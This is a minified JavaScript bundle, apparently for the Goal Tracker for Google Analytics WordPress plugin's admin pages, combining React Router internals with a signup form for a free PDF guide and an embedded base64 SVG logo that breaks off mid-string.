P=e=>e.join("/").replace(/\/\/+/g,"/"),R=e=>e.replace(/\/+$/,"").replace(/^\/*/,"/"),F=e=>e&&"?"!==e?e.startsWith("?")?e:"?"+e:"",_=e=>e&&"#"!==e?e.startsWith("#")?e:"#"+e:"";class q extends Error{}const B=["post","put","patch","delete"],Z=(new Set(B),["get",...B]);new Set(Z),new Set([301,302,303,307,308]),new Set([307,308]),"undefined"!=typeof window&&void 0!==window.document&&window.document.createElement,Symbol("deferred");const W="function"==typeof Object.is?Object.is:function(e,t){return e===t&&(0!==e||1/e==1/t)||e!=e&&t!=t},{useState:H,useEffect:V,useLayoutEffect:J,useDebugValue:X}=r;function K(e){const t=e.getSnapshot,r=e.value;try{const e=t();return!W(r,e)}catch(e){return!0}}"undefined"==typeof window||void 0===window.document||window.document.createElement;"useSyncExternalStore"in r&&r.useSyncExternalStore;const $=r.createContext(null),ee=r.createContext(null),te=r.createContext(null),re=r.createContext(null),ae=r.createContext({outlet:null,matches:[]}),ie=r.createContext(null);function ne(){return ne=Object.assign?Object.assign.bind():function(e){for(var t=1;t<arguments.length;t++){var r=arguments[t];for(var a in r)Object.prototype.hasOwnProperty.call(r,a)&&(e[a]=r[a])}return e},ne.apply(this,arguments)}function ue(){return null!=r.useContext(re)}function se(){return ue()||m(!1),r.useContext(re).location}function le(e,t){let{relative:a}=void 0===t?{}:t,{matches:i}=r.useContext(ae),{pathname:n}=se(),u=JSON.stringify(Q(i).map((e=>e.pathnameBase)));return r.useMemo((()=>G(e,JSON.parse(u),n,"path"===a)),[e,u,n,a])}function oe(){let e=function(){var e;let t=r.useContext(ie),a=function(e){let t=r.useContext(ee);return t||m(!1),t}(de.UseRouteError),i=function(e){let t=function(e){let t=r.useContext(ae);return t||m(!1),t}(),a=t.matches[t.matches.length-1];return a.route.id||m(!1),a.route.id}(de.UseRouteError);return t||(null==(e=a.errors)?void 0:e[i])}(),t=function(e){return null!=e&&"number"==typeof e.status&&"string"==typeof e.statusText&&"boolean"==typeof e.internal&&"data"in e}(e)?e.status+" "+e.statusText:e instanceof Error?e.message:JSON.stringify(e),a=e instanceof Error?e.stack:null,i={padding:"0.5rem",backgroundColor:"rgba(200,200,200, 0.5)"};return r.createElement(r.Fragment,null,r.createElement("h2",null,"Unexpected Application Error!"),r.createElement("h3",{style:{fontStyle:"italic"}},t),a?r.createElement("pre",{style:i},a):null,null)}class ce extends r.Component{constructor(e){super(e),this.state={location:e.location,error:e.error}}static getDerivedStateFromError(e){return{error:e}}static getDerivedStateFromProps(e,t){return t.location!==e.location?{error:e.error,location:e.location}:{error:e.error||t.error,location:t.location}}componentDidCatch(e,t){console.error("React Router caught the following error during render",e,t)}render(){return this.state.error?r.createElement(ae.Provider,{value:this.props.routeContext},r.createElement(ie.Provider,{value:this.state.error,children:this.props.component})):this.props.children}}function Le(e){let{routeContext:t,match:a,children:i}=e,n=r.useContext($);return n&&n.static&&n.staticContext&&(a.route.errorElement||a.route.ErrorBoundary)&&(n.staticContext._deepestRenderedBoundaryId=a.route.id),r.createElement(ae.Provider,{value:t},i)}var Me,de,je;function me(e){m(!1)}function Ne(e){let{basename:t="/",children:a=null,location:i,navigationType:n=d.Pop,navigator:u,static:s=!1}=e;ue()&&m(!1);let l=t.replace(/^\/*/,"/"),o=r.useMemo((()=>({basename:l,navigator:u,static:s})),[l,u,s]);"string"==typeof i&&(i=x(i));let{pathname:c="/",search:L="",hash:M="",state:j=null,key:N="default"}=i,y=r.useMemo((()=>{let e=Y(c,l);return null==e?null:{location:{pathname:e,search:L,hash:M,state:j,key:N},navigationType:n}}),[l,c,L,M,j,N,n]);return null==y?null:r.createElement(te.Provider,{value:o},r.createElement(re.Provider,{children:a,value:y}))}function ye(e){let{children:t,location:a}=e,i=r.useContext($);return function(e,t){ue()||m(!1);let{navigator:a}=r.useContext(te),i=r.useContext(ee),{matches:n}=r.useContext(ae),u=n[n.length-1],s=u?u.params:{},l=(u&&u.pathname,u?u.pathnameBase:"/");u&&u.route;let o,c=se();if(t){var L;let e="string"==typeof t?x(t):t;"/"===l||(null==(L=e.pathname)?void 0:L.startsWith(l))||m(!1),o=e}else o=c;let M=o.pathname||"/",j=T(e,{pathname:"/"===l?M:M.slice(l.length)||"/"}),N=function(e,t,a){if(void 0===t&&(t=[]),null==e){if(null==a||!a.errors)return null;e=a.matches}let i=e,n=null==a?void 0:a.errors;if(null!=n){let e=i.findIndex((e=>e.route.id&&(null==n?void 0:n[e.route.id])));e>=0||m(!1),i=i.slice(0,Math.min(i.length,e+1))}return i.reduceRight(((e,u,s)=>{let l=u.route.id?null==n?void 0:n[u.route.id]:null,o=null;a&&(o=u.route.ErrorBoundary?r.createElement(u.route.ErrorBoundary,null):u.route.errorElement?u.route.errorElement:r.createElement(oe,null));let c=t.concat(i.slice(0,s+1)),L=()=>{let t=e;return l?t=o:u.route.Component?t=r.createElement(u.route.Component,null):u.route.element&&(t=u.route.element),r.createElement(Le,{match:u,routeContext:{outlet:e,matches:c},children:t})};return a&&(u.route.ErrorBoundary||u.route.errorElement||0===s)?r.createElement(ce,{location:a.location,component:o,error:l,children:L(),routeContext:{outlet:null,matches:c}}):L()}),null)}(j&&j.map((e=>Object.assign({},e,{params:Object.assign({},s,e.params),pathname:P([l,a.encodeLocation?a.encodeLocation(e.pathname).pathname:e.pathname]),pathnameBase:"/"===e.pathnameBase?l:P([l,a.encodeLocation?a.encodeLocation(e.pathnameBase).pathname:e.pathnameBase])}))),n,i||void 0);return t&&N?r.createElement(re.Provider,{value:{location:ne({pathname:"/",search:"",hash:"",state:null,key:"default"},o),navigationType:d.Pop}},N):N}(i&&!t?i.router.routes:ge(t),a)}!function(e){e.UseBlocker="useBlocker",e.UseRevalidator="useRevalidator"}(Me||(Me={})),function(e){e.UseBlocker="useBlocker",e.UseLoaderData="useLoaderData",e.UseActionData="useActionData",e.UseRouteError="useRouteError",e.UseNavigation="useNavigation",e.UseRouteLoaderData="useRouteLoaderData",e.UseMatches="useMatches",e.UseRevalidator="useRevalidator"}(de||(de={})),function(e){e[e.pending=0]="pending",e[e.success=1]="success",e[e.error=2]="error"}(je||(je={})),new Promise((()=>{}));class pe extends r.Component{constructor(e){super(e),this.state={error:null}}static getDerivedStateFromError(e){return{error:e}}componentDidCatch(e,t){console.error("<Await> caught the following error during render",e,t)}render(){let{children:e,errorElement:t,resolve:r}=this.props,a=null,i=je.pending;if(r instanceof Promise)if(this.state.error){je.error;let e=this.state.error;Promise.reject().catch((()=>{})),Object.defineProperty(a,"_tracked",{get:()=>!0}),Object.defineProperty(a,"_error",{get:()=>e})}else r._tracked?void 0!==a._error?je.error:void 0!==a._data?je.success:je.pending:(je.pending,Object.defineProperty(r,"_tracked",{get:()=>!0}),r.then((e=>Object.defineProperty(r,"_data",{get:()=>e})),(e=>Object.defineProperty(r,"_error",{get:()=>e}))));else je.success,Promise.resolve(),Object.defineProperty(a,"_tracked",{get:()=>!0}),Object.defineProperty(a,"_data",{get:()=>r});if(i===je.error&&a._error instanceof AbortedDeferredError)throw neverSettledPromise;if(i===je.error&&!t)throw a._error;if(i===je.error)return React.createElement(AwaitContext.Provider,{value:a,children:t});if(i===je.success)return React.createElement(AwaitContext.Provider,{value:a,children:e});throw a}}function ge(e,t){void 0===t&&(t=[]);let a=[];return r.Children.forEach(e,((e,i)=>{if(!r.isValidElement(e))return;if(e.type===r.Fragment)return void a.push.apply(a,ge(e.props.children,t));e.type!==me&&m(!1),e.props.index&&e.props.children&&m(!1);let n=[...t,i],u={id:e.props.id||n.join("-"),caseSensitive:e.props.caseSensitive,element:e.props.element,Component:e.props.Component,index:e.props.index,path:e.props.path,loader:e.props.loader,action:e.props.action,errorElement:e.props.errorElement,ErrorBoundary:e.props.ErrorBoundary,hasErrorBoundary:null!=e.props.ErrorBoundary||null!=e.props.errorElement,shouldRevalidate:e.props.shouldRevalidate,handle:e.props.handle,lazy:e.props.lazy};e.props.children&&(u.children=ge(e.props.children,n)),a.push(u)})),a}function xe(){return xe=Object.assign?Object.assign.bind():function(e){for(var t=1;t<arguments.length;t++){var r=arguments[t];for(var a in r)Object.prototype.hasOwnProperty.call(r,a)&&(e[a]=r[a])}return e},xe.apply(this,arguments)}function we(e,t){if(null==e)return{};var r,a,i={},n=Object.keys(e);for(a=0;a<n.length;a++)r=n[a],t.indexOf(r)>=0||(i[r]=e[r]);return i}const Te=["onClick","relative","reloadDocument","replace","state","target","to","preventScrollReset"],Ee=["aria-current","caseSensitive","className","end","style","to","children"];function Se(e){let{basename:t,children:a,window:i}=e,n=r.useRef();var u;null==n.current&&(n.current=(void 0===(u={window:i,v5Compat:!0})&&(u={}),function(e,t,r,a){void 0===a&&(a={});let{window:i=document.defaultView,v5Compat:n=!1}=a,u=i.history,s=d.Pop,l=null,o=c();function c(){return(u.state||{idx:null}).idx}function L(){s=d.Pop;let e=c(),t=null==e?null:e-o;o=e,l&&l({action:s,location:x.location,delta:t})}function N(e){let t="null"!==i.location.origin?i.location.origin:i.location.href,r="string"==typeof e?e:g(e);return m(t,"No window.location.(origin|href) available to create URL for href: "+r),new URL(r,t)}null==o&&(o=0,u.replaceState(M({},u.state,{idx:o}),""));let x={get action(){return s},get location(){return e(i,u)},listen(e){if(l)throw new Error("A history only accepts one active listener");return i.addEventListener(j,L),l=e,()=>{i.removeEventListener(j,L),l=null}},createHref:e=>t(i,e),createURL:N,encodeLocation(e){let t=N(e);return{pathname:t.pathname,search:t.search,hash:t.hash}},push:function(e,t){s=d.Push;let a=p(x.location,e,t);r&&r(a,e),o=c()+1;let L=y(a,o),M=x.createHref(a);try{u.pushState(L,"",M)}catch(e){i.location.assign(M)}n&&l&&l({action:s,location:x.location,delta:1})},replace:function(e,t){s=d.Replace;let a=p(x.location,e,t);r&&r(a,e),o=c();let i=y(a,o),L=x.createHref(a);u.replaceState(i,"",L),n&&l&&l({action:s,location:x.location,delta:0})},go:e=>u.go(e)};return x}((function(e,t){let{pathname:r="/",search:a="",hash:i=""}=x(e.location.hash.substr(1));return p("",{pathname:r,search:a,hash:i},t.state&&t.state.usr||null,t.state&&t.state.key||"default")}),(function(e,t){let r=e.document.querySelector("base"),a="";if(r&&r.getAttribute("href")){let t=e.location.href,r=t.indexOf("#");a=-1===r?t:t.slice(0,r)}return a+"#"+("string"==typeof t?t:g(t))}),(function(e,t){N("/"===e.pathname.charAt(0),"relative pathnames are not supported in hash history.push("+JSON.stringify(t)+")")}),u)));let s=n.current,[l,o]=r.useState({action:s.action,location:s.location});return r.useLayoutEffect((()=>s.listen(o)),[s]),r.createElement(Ne,{basename:t,children:a,location:l.location,navigationType:l.action,navigator:s})}const De="undefined"!=typeof window&&void 0!==window.document&&void 0!==window.document.createElement,fe=/^(?:[a-z][a-z0-9+.-]*:|\/\/)/i,he=r.forwardRef((function(e,t){let a,{onClick:i,relative:n,reloadDocument:u,replace:s,state:l,target:o,to:c,preventScrollReset:L}=e,M=we(e,Te),{basename:d}=r.useContext(te),j=!1;if("string"==typeof c&&fe.test(c)&&(a=c,De)){let e=new URL(window.location.href),t=c.startsWith("//")?new URL(e.protocol+c):new URL(c),r=Y(t.pathname,d);t.origin===e.origin&&null!=r?c=r+t.search+t.hash:j=!0}let N=function(e,t){let{relative:a}=void 0===t?{}:t;ue()||m(!1);let{basename:i,navigator:n}=r.useContext(te),{hash:u,pathname:s,search:l}=le(e,{relative:a}),o=s;return"/"!==i&&(o="/"===s?i:P([i,s])),n.createHref({pathname:o,search:l,hash:u})}(c,{relative:n}),y=function(e,t){let{target:a,replace:i,state:n,preventScrollReset:u,relative:s}=void 0===t?{}:t,l=function(){ue()||m(!1);let{basename:e,navigator:t}=r.useContext(te),{matches:a}=r.useContext(ae),{pathname:i}=se(),n=JSON.stringify(Q(a).map((e=>e.pathnameBase))),u=r.useRef(!1);r.useEffect((()=>{u.current=!0}));let s=r.useCallback((function(r,a){if(void 0===a&&(a={}),!u.current)return;if("number"==typeof r)return void t.go(r);let s=G(r,JSON.parse(n),i,"path"===a.relative);"/"!==e&&(s.pathname="/"===s.pathname?e:P([e,s.pathname])),(a.replace?t.replace:t.push)(s,a.state,a)}),[e,t,n,i]);return s}(),o=se(),c=le(e,{relative:s});return r.useCallback((t=>{if(function(e,t){return!(0!==e.button||t&&"_self"!==t||function(e){return!!(e.metaKey||e.altKey||e.ctrlKey||e.shiftKey)}(e))}(t,a)){t.preventDefault();let r=void 0!==i?i:g(o)===g(c);l(e,{replace:r,state:n,preventScrollReset:u,relative:s})}}),[o,l,c,i,n,a,e,u,s])}(c,{replace:s,state:l,target:o,preventScrollReset:L,relative:n});return r.createElement("a",xe({},M,{href:a||N,onClick:j||u?i:function(e){i&&i(e),e.defaultPrevented||y(e)},ref:t,target:o}))})),Ie=r.forwardRef((function(e,t){let{"aria-current":a="page",caseSensitive:i=!1,className:n="",end:u=!1,style:s,to:l,children:o}=e,c=we(e,Ee),L=le(l,{relative:c.relative}),M=se(),d=r.useContext(ee),{navigator:j}=r.useContext(te),m=j.encodeLocation?j.encodeLocation(L).pathname:L.pathname,N=M.pathname,y=d&&d.navigation&&d.navigation.location?d.navigation.location.pathname:null;i||(N=N.toLowerCase(),y=y?y.toLowerCase():null,m=m.toLowerCase());let p,g=N===m||!u&&N.startsWith(m)&&"/"===N.charAt(m.length),x=null!=y&&(y===m||!u&&y.startsWith(m)&&"/"===y.charAt(m.length)),w=g?a:void 0;p="function"==typeof n?n({isActive:g,isPending:x}):[n,g?"active":null,x?"pending":null].filter(Boolean).join(" ");let T="function"==typeof s?s({isActive:g,isPending:x}):s;return r.createElement(he,xe({},c,{"aria-current":w,className:p,ref:t,style:T,to:l}),"function"==typeof o?o({isActive:g,isPending:x}):o)}));var Ce,ze;(function(e){e.UseScrollRestoration="useScrollRestoration",e.UseSubmitImpl="useSubmitImpl",e.UseFetcher="useFetcher"})(Ce||(Ce={})),function(e){e.UseFetchers="useFetchers",e.UseScrollRestoration="useScrollRestoration"}(ze||(ze={}));var be=i(644),Oe=i.n(be);const ve=i.p+"images/Smirk.4b4e78cd.png",ke=["Installing and activating the plugin with ease","Connecting the plugin to Google Analytics","Disabling page_view tracking when using Google Tag Manager","Using Debug View for effective event testing and debugging","Simple email and link tracking with just a few clicks","Enabling email link tracking in General Settings and creating a Custom Dimension in Google Analytics","Tracking button clicks with class or ID attributes and custom events","Distinguishing between custom and recommended events","Applying visibility tracking to monitor your call-to-action buttons' exposure"],Ae=t=>{let{feature:r,index:a}=t;return(0,e.createElement)("li",{className:"p-2 shadow rounded flex border border-grey-100/10"},a&&(0,e.createElement)("span",{className:"rounded-full w-6 h-6 bg-brand-primary text-white justify-center flex items-center"},a),(0,e.createElement)("span",{className:"ml-2 flex-1 text-base"},r))},Ye=()=>{const[t,a]=(0,r.useState)(""),[i,n]=(0,r.useState)(!1),[u,s]=(0,r.useState)(!0);return(0,e.createElement)("section",{className:"bg-white/50 py-4"},(0,e.createElement)(Ut,{showTutorial:u,showCloseButton:!1}),!i&&(0,e.createElement)("div",{className:"bg-white py-4 rounded-md border border-gray-200 my-10 mx-4 shadow-xl"},(0,e.createElement)("div",{className:""},(0,e.createElement)("div",{className:"px-4 py-5 sm:p-6"},(0,e.createElement)("h3",{className:"text-3xl mb-6 leading-10 text-gray-900 max-w-xl"},"Download the Free Goal Tracker for Google Analytics Getting Started Guide"),(0,e.createElement)("div",{className:"mt-2 max-w-xl text-gray-500 p-2"},(0,e.createElement)("p",{className:"text-xl"},"Get the most out of the Goal Tracker for Google Analytics WordPress plugin with our straightforward Getting Started Guide."),(0,e.createElement)("p",{className:"text-brand-primary text-lg"},"Learn these essential skills to improve your website tracking:"),(0,e.createElement)("ul",{role:"list",className:"list-inside p-1 mt-2"},ke.map(((t,r)=>(0,e.createElement)(Ae,{key:r,feature:t,index:r+1}))))),(0,e.createElement)("form",{className:"mt-5 sm:items-center max-w-xl px-4 py-2"},(0,e.createElement)("div",{className:"text-brand-primary text-lg mb-2"},"👉 Download your FREE PDF guide here:"),(0,e.createElement)("fieldset",{className:"flex"},(0,e.createElement)("div",{className:"w-full flex"},(0,e.createElement)("label",{htmlFor:"email",className:"sr-only"},"Email"),(0,e.createElement)("input",{type:"email",name:"email",id:"email",value:t,onChange:e=>a(e.target.value),className:o()("shadow-sm ","focus:ring-indigo-500 focus:border-indigo-500 ","flex-1 text-lg","border-gray-300 rounded-l rounder-r-0 p-2"),placeholder:"you@example.com"})),(0,e.createElement)("button",{type:"submit",onClick:async function(e){e.preventDefault();let r=new FormData;r.append("fields[email]",t),await Oe()({url:"https://assets.mailerlite.com/jsonp/31991/forms/70109343150769330/subscribe",method:"POST",data:r,headers:{"Content-Type":"multipart/form-data"}}),n(!0)},className:o()("capitalize inline-flex","items-center justify-center","rounded-r","border border-transparent bg-brand-primary","px-4 py-2","text-sm font-medium text-white","shadow-sm","hover:bg-brand-600","focus:outline-none focus:ring-2 focus:ring-brand-primary-focus focus:ring-offset-2","transform active:scale-75 hover:scale-105 transition-transform")},"Download")))))),i&&(0,e.createElement)("div",{className:"min-h-full pt-16 pb-12 flex flex-col bg-white"},(0,e.createElement)("main",{className:"flex-grow flex flex-col justify-center max-w-7xl w-full mx-auto px-4 sm:px-6 lg:px-8"},(0,e.createElement)("div",{className:"flex-shrink-0 flex justify-center"},(0,e.createElement)("span",{className:"sr-only"},"Workflow"),(0,e.createElement)("img",{className:"h-28 w-auto",src:ve,alt:""})),(0,e.createElement)("div",{className:"py-16"},(0,e.createElement)("div",{className:"text-center"},(0,e.createElement)("h1",{className:"mt-2 text-2xl font-extrabold text-gray-900 tracking-tight sm:text-4xl"},"Check your inbox for the Getting Started Guide"),(0,e.createElement)("div",{className:"mt-6"})))),(0,e.createElement)("footer",{className:"flex-shrink-0 max-w-7xl w-full mx-auto px-4 sm:px-6 lg:px-8"})))};r.forwardRef((function(e,t){return r.createElement("svg",Object.assign({xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 20 20",fill:"currentColor","aria-hidden":"true",ref:t},e),r.createElement("path",{fillRule:"evenodd",d:"M6 2a1 1 0 00-1 1v1H4a2 2 0 00-2 2v10a2 2 0 002 2h12a2 2 0 002-2V6a2 2 0 00-2-2h-1V3a1 1 0 10-2 0v1H7V3a1 1 0 00-1-1zm0 5a1 1 0 000 2h8a1 1 0 100-2H6z",clipRule:"evenodd"}))}));const Ue="data:image/svg+xml;base64,PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iVVRGLTgiPz4KPHN2ZyBpZD0iTGF5ZXJfMSIKICB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciCiAgeG1sbnM6eGxpbms9Imh0dHA6Ly93d3cudzMub3JnLzE5OTkveGxpbmsiIHZpZXdCb3g9IjAgMCA5NDkuNTQgMjUzLjU4Ij4KICA8ZGVmcz4KICAgIDxzdHlsZT4uY2xzLTF7ZmlsbDpub25lO30uY2xzLTJ7ZmlsbDojZmZmO30uY2xzLTN7ZmlsbDojZWYzZTJmO308L3N0eWxlPgogICAgPHN5bWJvbCBpZD0iTG9nby1Hb2FsVHJhY2tlciIgdmlld0JveD0iMCAwIDU2OS41NCA4My45MSI+CiAgICAgIDxnPgogICAgICAgIDxwYXRoIGQ9Ik02Ny44OSwzMi45OHMtMjEuMTYtLjExLTI1LjAxLS4xMmMtMi4yMiwwLTMuOTMsLjc0LTUuNDgsMi4yNi00LjcsNC42My0xLjMyLDEzLjc3LDUuNDgsMTMuNDhoMjEuODljLTQuODcsMjMuOTQtMzcuNzQsMjQuODEtNDYuOTIsMy4xMkM3Ljc4LDI3LjM1LDM2LjQyLDQuODcsNTcuNDUsMjEuNDVjOS4zNyw3Ljg2LDE5LjM5LTUuNTYsOS43NC0xMi42OEM2MC4yOSwyLjgyLDUxLjE4LS4wMiw0MS40MSwwLDEyLjM4LS40OS04LjQxLDMxLjM3LDMuMzQsNTcuNzVjMTAuNDMsMjYuNDIsNDcuOSwzNC41Miw2Ni45NCwxMi45Miw5LjA2LTkuOTMsMTguMy0zNy4zNy0yLjM5LTM3LjY5WiIvPgogICAgICAgIDxwYXRoIGQ9Ik0xMzAuMzYsMzYuMzRjLTEyLjk5LTEzLjU3LTM3LjY1LTguOS00NC41MSw4LjY5LTkuNDIsMjIuNTQsMTMuMjUsNDUuMzgsMzUuODIsMzUuOTQsMTcuNTMtNi45MywyMi4zMS0zMS42Myw4LjY5LTQ0LjYzWm0tNy42NSwyNC4zMmMtMy4xMSw4LjExLTE0LjgsMTAuMzgtMjAuNjQsNC4wMS00LjgxLTQuNjUtNC44Ny0xMy4yOCwwLTE3Ljk2LDkuNzQtOS44LDI2LjAzLDEuMjEsMjAuNjQsMTMuOTVaIi8+CiAgICAgICAgPHBhdGggZD0iTTE5MC4zOCwyOC43MmMtMy42NC0uMzMtNS40LDEuMzEtNi45NSwzLjMxLTE3Ljk5LTEwLjQ5LTQxLjMzLDIuODMtNDEuMjIsMjMuNy0uMzIsMjAuNjIsMjMuNDUsMzQuMjksNDEuMTYsMjMuNzksMS43NCwyLjIyLDMuODUsMy4yNyw2Ljk3LDMuMjIsNC43MS0uMDksNi42Mi00LjgzLDYuNTYtOC44M1YzNy42OGMtLjE1LTQuMTYtMi42Ni04LjYxLTYuNTItOC45NlptLTguMDcsMjcuMDJjMCwzLjctMS4yMyw2LjgxLTMuNjMsOS4yNmgwYy0xMi44MywxMS42NC0yOS44LTUuNzktMTguMjktMTguNTUsNy44LTguMDQsMjIuNDUtMi4xNiwyMS45Miw5LjI5WiIvPgogICAgICAgIDxwYXRoIGQ9Ik0zNjguMzYsMjguNzJjLTMuNjQtLjMzLTUuNCwxLjMxLTYuOTUsMy4zMS0xNy45OS0xMC40OS00MS4zMywyLjgzLTQxLjIyLDIzLjctLjMyLDIwLjYyLDIzLjQ1LDM0LjI5LDQxLjE2LDIzLjc5LDEuNzQsMi4yMiwzLjg1LDMuMjcsNi45NywzLjIyLDQuNzEtLjA5LDYuNjItNC44Myw2LjU2LTguODNWMzcuNjhjLS4xNS00LjE2LTIuNjYtOC42MS02LjUyLTguOTZabS04LjA3LDI3LjAyYzAsMy43LTEuMjMsNi44MS0zLjYzLDkuMjZoMGMtMTIuODMsMTEuNjQtMjkuOC01Ljc5LTE4LjI5LTE4LjU1LDcuOC04LjA0LDIyLjQ1LTIuMTYsMjEuOTIsOS4yOVoiLz4KICAgICAgICA8cGF0aCBkPSJNMjkzLjQ2LDE0LjE0YzUuMS00LjQ3LDEuMTItMTMuMjItNS4zMi0xMy4yM2gtNDYuNDRjLTguMjgsLjYzLTEwLjQzLDExLjQ5LTIuNjUsMTUuMDgsLjg3LC40NCwxLjc0LC42NCwyLjY1LC42NGgxNS4zdjU4LjY1Yy0uMTIsNC42MSwzLjYyLDcuMzgsNy45Myw3LjM2LDQuMzMsLjAyLDcuOTItMi43Nyw3LjgxLTcuMzZWMTYuNjNzMTUuNDIsMCwxNS40MiwwYzEuOTQsLjAyLDMuOTItMS4xMiw1LjMxLTIuNDlaIi8+CiAgICAgICAgPHBhdGggZD0iTTMyMC4yMiwzMi45N2MtMy4wMS02Ljc5LTEyLjA4LTQuODktMTcuMzgtMS44Ny0yLjQ5LTMuNC03LjkyLTMuNTctMTAuOTMtLjc4LTEuMzgsMS4yNC0yLjA4LDMuNC0yLjA4LDYuNDR2MzcuMDZjLjA5LDIuMzMsLjUzLDUuNDMsMi4xNiw2Ljk1LDIuNSwyLjM5LDcuNzIsMi42OCwxMC4zMi0uMjgsMS40LTEuNDMsMi4xMS0zLjcyLDIuMTEtNi44MXYtMjIuMjFjLjI4LTQuODcsNC40My03Ljk0LDktOC40OCw0LjcxLS4yNyw5LjAzLTUuMzEsNi43OS0xMC4wMloiLz4KICAgICAgICA8cGF0aCBjbGFzcz0iY2xzLTMiIGQ9Ik00MzAuNjUsNDQuNTNjLTIuNDYtMi41LTUuNTktMi43OS04LjQxLS4zNi0xLjA2LC45Ni0yLjM3LDIuNTEtMi4zNywzLjUtLjI2LDMuNjQsLjg0LDcuMjQsLjA0LDEwLjMxLTEuMDQsNS43OC03LjA4LDEwLjM3LTEyLjk0LDEwLjEtMTUuOTUtLjU2LTE4LjE5LTIyLjQ5LTMuMTctMjYuNjZsLjIyLDEuMjljLjQ3LDMuMzMsNC45OSw0LjY5LDcuMiwyLjEybDguOTYtOS43YzEuOTItMS45OCwxLjIxLTUuNTYtMS4zMi02LjY0bC0xMS41NS01LjMyYy0zLjg1LTEuNTgtNi45LDItNS42Niw1Ljc2LTI1Ljk0LDQuOTEtMjkuMTQsNDAuNy00LjkyLDUwLjYxLDIwLjg1LDguNjcsNDIuNjMtMTEuNzQsMzUuMjctMzMuMS0uMTktLjU1LS42OC0xLjI0LTEuMzUtMS44OVoiLz4KICAgICAgICA8cGF0aCBkPSJNNDY1LjQ4LDU2LjE5bC0uNTMtLjY2LDEyLjg3LTE2LjI4YzIuMS0zLjE0LDEuMDQtNy40Ny0yLjI1LTkuMzctMy4xNy0xLjk0LTcuNDEtLjkzLTkuMzcsMi4xMmwtMTQuMjMsMTguNTVWMTUuMDljMC0zLjIyLS43LTUuNTQtMi4wOC02LjktNS40LTQuODEtMTMuMjEtLjk3LTEyLjUyLDYuOXY1OC43MmMtLjg0LDExLjg0LDE1LjQzLDExLjg5LDE0LjU5LDB2LTEyLjk5czE0LjM2LDE4LjQ0LDE0LjM2LDE4LjQ0YzIuMTEsMy4yNyw2LjIsNC4wNiw5LjYzLDIuMDQsMy4xMi0xLjg2LDQuMjEtNi4zNCwyLjA1LTkuMzMtMS40LTIuMS05LjIzLTExLjc0LTEyLjUzLTE1Ljc4WiIvPgogICAgICAgIDxwYXRoIGQ9Ik01MzAuOTgsNDIuOTljLTcuNzYtMTYuMDYtMzEuMTktMTkuNC00My4zMi02LjY5LTEwLjU4LDEwLjAxLTkuOTIsMjguMjEsLjAxLDM4LjczLDguMDUsOC41NCwxOS41MiwxMC41OSwyOS40Myw3LjU1LDQuODItMS40OCwxMS41LTUuMTYsMTEuMjItMTAuOTQtLjE1LTMuMDgtMi4zOC01LjYtNi4wMS01LjM3LTMuNDQsLjIyLTUuNzYsMi40Ni05LjE5LDMuMzYtOC44MiwyLjI5LTE3LjU2LTMuMDUtMTcuNzQtOS41LDAsMCwyMy4zNywuNjksMzEuMTIsMCw0LjY2LS40MSw3LjQyLTMuNjksNy4xOC03Ljc4LS4xOS0zLjMtMS4yNy02LjQ0LTIuNy05LjM3Wm0tMzQuNTMsNi4wMWMxLjYtOS42MiwxOS43My0xMC4zOSwyMi42MiwwaC0yMi42MloiLz4KICAgICAgICA8cGF0aCBkPSJNNTY4LjkzLDMyLjk3Yy0zLjAxLTYuNzktMTIuMDgtNC44OS0xNy4zOC0xLjg3LTIuNDktMy40LTcuOTItMy41Ny0xMC45NC0uNzgtMS4zNywxLjIzLTIuMDgsMy40LTIuMDgsNi40NHYzNy4wNmMuMDksMi4zMywuNTMsNS40MywyLjE2LDYuOTUsMi41LDIuMzksNy43MywyLjY4LDEwLjMyLS4yOCwxLjQtMS40MywyLjExLTMuNzIsMi4xMS02Ljgxdi0yMi4yMWMuMjgtNC44Nyw0LjQzLTcuOTQsOS04LjQ4LDQuNzItLjI2LDkuMDUtNS4zMSw2LjgtMTAuMDJaIi8+CiAgICAgICAgPHBhdGggZD0iTTIyNy4zOSw2OC4xMmMtNy42LS45OC03LjAxLTcuOS03LjE0LTEzLjY3LDAtLjIzLC4wNC0zOS4zOSwuMDQtMzkuMzksLjA5LTUuNDUtMi4yNS04Ljc4LTcuMTMtOC45NS01LjA4LC4xMy03LjU1LDMuMzUtNy40Nyw4Ljk1LDAsMCwuMDUsMzkuMTksLjA1LDM5LjQ1LDAsMTUuNTQsNS4wOCwyNy4yNSwyMS4yLDI4LjExLDkuMjUtLjE4LDkuNjgtMTMuMzEsLjQ1LTE0LjVaIi8+CiAgICAgIDwvZz4KICAgIDwvc3ltYm9sPgogICAgPHN5bWJvbCBpZD0iTm9Db2RlLUdhNCIgdmlld0JveD0iMCAwIDQzMy4zMiA5My43MiI+CiAgICAgIDxnPgogICAgICAgIDxwYXRoIGQ9Ik0yMS42Nyw5LjEzdjI1LjJoLTMuMjhMNi4xOSwxNC4zOXYxOS45NEgyLjg4VjkuMTNoMy40OWwxMS45OSwxOS42OVY5LjEzaDMuMzFaIi8+CiAgICAgICAgPHBhdGggZD0iTTI5LjkzLDMzLjU2Yy0xLjMxLS43Ni0yLjMyLTEuODQtMy4wMi0zLjI2LS43MS0xLjQyLTEuMDYtMy4wNy0xLjA2LTQuOTdzLjM1LTMuNTUsMS4wNi00Ljk3Yy43MS0xLjQyLDEuNzItMi41LDMuMDItMy4yNnMyLjg1LTEuMTMsNC42My0xLjEzYzIuNjksMCw0LjgyLC44NCw2LjM5LDIuNTIsMS41NywxLjY4LDIuMzYsMy45NiwyLjM2LDYuODRzLS43OSw1LjE2LTIuMzYsNi44NGMtMS41NywxLjY4LTMuNywyLjUyLTYuMzksMi41Mi0xLjc4LDAtMy4zMi0uMzgtNC42My0xLjEzWm04LjgtMy4wOGMxLjAxLTEuMjUsMS41MS0yLjk2LDEuNTEtNS4xNXMtLjUtMy45LTEuNTEtNS4xNWMtMS4wMS0xLjI1LTIuNC0xLjg3LTQuMTgtMS44N3MtMy4xMywuNjItNC4xNCwxLjg3Yy0xLjAxLDEuMjUtMS41MSwyLjk2LTEuNTEsNS4xNXMuNSwzLjksMS41MSw1LjE1YzEuMDEsMS4yNSwyLjM5LDEuODcsNC4xNCwxLjg3czMuMTctLjYyLDQuMTgtMS44N1oiLz4KICAgICAgICA8cGF0aCBkPSJNNDUuNzksMjMuNjRoOS44NnYyLjIzaC05Ljg2di0yLjIzWiIvPgogICAgICAgID